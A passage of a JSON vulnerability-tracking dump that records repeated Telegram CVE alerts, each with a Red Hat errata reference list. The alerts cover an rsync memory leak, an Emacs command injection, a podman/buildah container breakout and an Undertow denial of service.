Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "edfb12cb-2c39-4f2f-86e4-fa35d37f8e9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1242", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "8e7aa54d-fe96-4cd9-a12a-370a7f602ac3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0325", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12085\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A flaw was found in rsync which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.\n\ud83d\udccf Published: 2025-01-14T17:37:16.036Z\n\ud83d\udccf Modified: 2025-02-26T14:20:59.800Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0324\n2. https://access.redhat.com/errata/RHSA-2025:0325\n3. https://access.redhat.com/errata/RHSA-2025:0637\n4. https://access.redhat.com/errata/RHSA-2025:0688\n5. https://access.redhat.com/errata/RHSA-2025:0714\n6. https://access.redhat.com/errata/RHSA-2025:0774\n7. https://access.redhat.com/errata/RHSA-2025:0787\n8. https://access.redhat.com/errata/RHSA-2025:0790\n9. https://access.redhat.com/errata/RHSA-2025:0849\n10. https://access.redhat.com/errata/RHSA-2025:0884\n11. https://access.redhat.com/errata/RHSA-2025:0885\n12. https://access.redhat.com/errata/RHSA-2025:1120\n13. https://access.redhat.com/errata/RHSA-2025:1123\n14. https://access.redhat.com/errata/RHSA-2025:1128\n15. https://access.redhat.com/errata/RHSA-2025:1225\n16. https://access.redhat.com/errata/RHSA-2025:1227\n17. https://access.redhat.com/errata/RHSA-2025:1242\n18. https://access.redhat.com/errata/RHSA-2025:1451\n19. https://access.redhat.com/security/cve/CVE-2024-12085\n20. https://bugzilla.redhat.com/show_bug.cgi?id=2330539\n21. https://kb.cert.org/vuls/id/952657", "creation_timestamp": "2025-02-26T14:25:20.000000Z"}, {"uuid": "add04677-95b2-4e1d-b134-aa8ee817c004", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1915", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5662", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1244\n\ud83d\udd25 CVSS Score: 8.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A command injection flaw was found in the text editor Emacs. It could allow a remote, unauthenticated attacker to execute arbitrary shell commands on a vulnerable system. Exploitation is possible by tricking users into visiting a specially crafted website or an HTTP URL with a redirect.\n\ud83d\udccf Published: 2025-02-12T14:27:45.707Z\n\ud83d\udccf Modified: 2025-02-27T10:10:07.259Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1915\n2. https://access.redhat.com/security/cve/CVE-2025-1244\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2345150", "creation_timestamp": "2025-02-27T10:26:57.000000Z"}, {"uuid": "8f747d3b-7121-4733-b677-6da77a915919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1187", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "80ed43c2-c882-4a56-ab42-515b08a96716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0830", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "e37a6820-18d7-42ba-acb5-b2ced8c4f268", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1186", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5635", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-02-27T00:54:39.333Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/security/cve/CVE-2024-11218\n17. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-02-27T01:26:02.000000Z"}, {"uuid": "0b798ca1-f82c-4de3-833f-27f16a3c8802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3354", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5664", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-02-27T10:40:09.662Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/security/cve/CVE-2024-1635\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-02-27T11:25:30.000000Z"}, {"uuid": "e84bc461-ba5c-4455-85a2-6484e3612da8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1674", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5664", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-02-27T10:40:09.662Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/security/cve/CVE-2024-1635\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-02-27T11:25:30.000000Z"}, {"uuid": "093b79e6-6cb2-49a4-be6b-a13ad089e340", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1860", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5664", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-02-27T10:40:09.662Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/security/cve/CVE-2024-1635\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-02-27T11:25:30.000000Z"}, {"uuid": "9cf95817-050c-42cb-a729-867702cb7be9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1675", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5664", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-02-27T10:40:09.662Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/security/cve/CVE-2024-1635\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-02-27T11:25:30.000000Z"}, {"uuid": "59768ed3-8952-4b39-b82b-3645866faae2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1864", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5664", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-02-27T10:40:09.662Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/security/cve/CVE-2024-1635\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-02-27T11:25:30.000000Z"}, {"uuid": "785a10ee-d554-4ce3-9c76-975c11c4b659", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1676", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5664", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-02-27T10:40:09.662Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/security/cve/CVE-2024-1635\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-02-27T11:25:30.000000Z"}, {"uuid": "38d2ebc4-447f-4a43-a829-f5fece8dd9b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5664", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. \n\nAt HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.\n\ud83d\udccf Published: 2024-02-19T21:23:14.496Z\n\ud83d\udccf Modified: 2025-02-27T10:40:09.662Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1674\n2. https://access.redhat.com/errata/RHSA-2024:1675\n3. https://access.redhat.com/errata/RHSA-2024:1676\n4. https://access.redhat.com/errata/RHSA-2024:1677\n5. https://access.redhat.com/errata/RHSA-2024:1860\n6. https://access.redhat.com/errata/RHSA-2024:1861\n7. https://access.redhat.com/errata/RHSA-2024:1862\n8. https://access.redhat.com/errata/RHSA-2024:1864\n9. https://access.redhat.com/errata/RHSA-2024:1866\n10. https://access.redhat.com/errata/RHSA-2024:3354\n11. https://access.redhat.com/security/cve/CVE-2024-1635\n12. https://bugzilla.redhat.com/show_bug.cgi?id=2264928", "creation_timestamp": "2025-02-27T11:25:30.000000Z"}, {"uuid": "228264eb-9865-4307-b3d2-75c932f58ee3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1677", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5664", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1635\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. 